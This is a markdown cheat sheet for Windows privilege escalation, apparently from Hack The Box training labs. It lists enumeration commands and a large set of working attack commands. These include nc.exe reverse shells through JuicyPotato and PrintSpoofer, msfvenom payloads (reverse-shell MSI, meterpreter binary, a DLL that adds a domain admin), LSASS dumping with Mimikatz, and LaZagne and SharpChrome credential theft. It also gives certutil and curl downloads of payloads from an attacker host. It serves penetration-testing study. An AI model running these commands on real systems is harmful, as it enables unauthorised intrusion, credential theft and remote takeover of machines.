Skip to content

Latest commit

 

History

History
134 lines (121 loc) · 12.1 KB

WINDOWS PRIVILEGE ESCALATION.md

File metadata and controls

134 lines (121 loc) · 12.1 KB

Initial Enumeration

Command Description
xfreerdp /v:<target ip> /u:htb-student RDP to lab target
ipconfig /all Get interface, IP address and DNS information
arp -a Review ARP table
route print Review routing table
Get-MpComputerStatus Check Windows Defender status
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections List AppLocker rules
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone Test AppLocker policy
set Display all environment variables
systeminfo View detailed system configuration information
wmic qfe Get patches and updates
wmic product get name Get installed programs
tasklist /svc Display running processes
query user Get logged-in users
echo %USERNAME% Get current user
whoami /priv View current user privileges
whoami /groups View current user group information
net user Get all system users
net localgroup Get all system groups
net localgroup administrators View details about a group
net accounts Get passsword policy
netstat -ano Display active network connections
pipelist.exe /accepteula List named pipes
gci \\.\pipe\ List named pipes with PowerShell
accesschk.exe /accepteula \\.\Pipe\lsass -v Review permissions on a named pipe

Handy Commands

Command Description
mssqlclient.py [email protected] -windows-auth Connect using mssqlclient.py
enable_xp_cmdshell Enable xp_cmdshell with mssqlclient.py
xp_cmdshell whoami Run OS commands with xp_cmdshell
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 443 -e cmd.exe" -t * Escalate privileges with JuicyPotato
c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd" Escalating privileges with PrintSpoofer
procdump.exe -accepteula -ma lsass.exe lsass.dmp Take memory dump with ProcDump
sekurlsa::minidump lsass.dmp and sekurlsa::logonpasswords Use MimiKatz to extract credentials from LSASS memory dump
dir /q C:\backups\wwwroot\web.config Checking ownership of a file
takeown /f C:\backups\wwwroot\web.config Taking ownership of a file
Get-ChildItem -Path ‘C:\backups\wwwroot\web.config’ | select name,directory, @{Name=“Owner”;Expression={(Ge t-ACL $_.Fullname).Owner}} Confirming changed ownership of a file
icacls “C:\backups\wwwroot\web.config” /grant htb-student:F Modifying a file ACL
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL Extract hashes with secretsdump.py
robocopy /B E:\Windows\NTDS .\ntds ntds.dit Copy files with ROBOCOPY
wevtutil qe Security /rd:true /f:text | Select-String "/user" Searching security event logs
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user" Passing credentials to wevtutil
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*' } | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }} Searching event logs with PowerShell
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll Generate malicious DLL
dnscmd.exe /config /serverlevelplugindll adduser.dll Loading a custom DLL with dnscmd
wmic useraccount where name="netadm" get sid Finding a user's SID
sc.exe sdshow DNS Checking permissions on DNS service
sc stop dns Stopping a service
sc start dns Starting a service
reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters Querying a registry key
reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll Deleting a registry key
sc query dns Checking a service status
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local Disabling the global query block list
Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3 Adding a WPAD record
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp Compile with cl.exe
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys" Add reference to a driver (1)
reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1 Add reference to a driver (2)
.\DriverView.exe /stext drivers.txt and cat drivers.txt | Select-String -pattern Capcom Check if driver is loaded
EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys Using EopLoadDriver
c:\Tools\PsService.exe security AppReadiness Checking service permissions with PsService
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" Modifying a service binary path
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA Confirming UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin Checking UAC level
[environment]::OSVersion.Version Checking Windows version
cmd /c echo %PATH% Reviewing path variable
curl http://10.10.14.3:8080/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll" Downloading file with cURL in PowerShell
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll Executing custom dll with rundll32.exe
.\SharpUp.exe audit Running SharpUp
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe" Checking service permissions with icacls
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe" Replace a service binary
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ Searching for unquoted service paths
accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services Checking for weak service ACLs in the Registry
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443" Changing ImagePath with PowerShell
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl Check startup programs
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe Generating a malicious binary
get-process -Id 3324 Enumerating a process ID with PowerShell
get-service | ? {$_.DisplayName -like 'Druva*'} Enumerate a running service by name with PowerShell

Credential Theft

Command Description
findstr /SIM /C:"password" *.txt *ini *.cfg *.config *.xml Search for files with the phrase "password"
gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password Searching for passwords in Chrome dictionary files
(Get-PSReadLineOption).HistorySavePath Confirm PowerShell history save path
gc (Get-PSReadLineOption).HistorySavePath Reading PowerShell history file
$credential = Import-Clixml -Path 'C:\scripts\pass.xml' Decrypting PowerShell credentials
cd c:\Users\htb-student\Documents & findstr /SI /M "password" *.xml *.ini *.txt Searching file contents for a string
findstr /si password *.xml *.ini *.txt *.config Searching file contents for a string
findstr /spin "password" *.* Searching file contents for a string
select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password Search file contents with PowerShell
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* Search for file extensions
where /R C:\ *.config Search for file extensions
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore Search for file extensions using PowerShell
cmdkey /list List saved credentials
.\SharpChrome.exe logins /unprotect Retrieve saved Chrome credentials
.\lazagne.exe -h View LaZagne help menu
.\lazagne.exe all Run all LaZagne modules
Invoke-SessionGopher -Target WINLPE-SRV01 Running SessionGopher
netsh wlan show profile View saved wireless networks
netsh wlan show profile ilfreight_corp key=clear Retrieve saved wireless passwords

Other Commands

Command Description
certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat Transfer file with certutil
certutil -encode file1 encodedfile Encode file with certutil
certutil -decode encodedfile file2 Decode file with certutil
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer Query for always install elevated registry key (1)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer Query for always install elevated registry key (2)
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi Generate a malicious MSI package
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart Executing an MSI package from command line
schtasks /query /fo LIST /v Enumerate scheduled tasks
Get-ScheduledTask | select TaskName,State Enumerate scheduled tasks with PowerShell
.\accesschk64.exe /accepteula -s -d C:\Scripts\ Check permissions on a directory
Get-LocalUser Check local user description field
Get-WmiObject -Class Win32_OperatingSystem | select Description Enumerate computer description field
guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmd Mount VMDK on Linux
guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1 Mount VHD/VHDX on Linux
sudo python2.7 windows-exploit-suggester.py --update Update Windows Exploit Suggester database
python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt Running Windows Exploit Suggester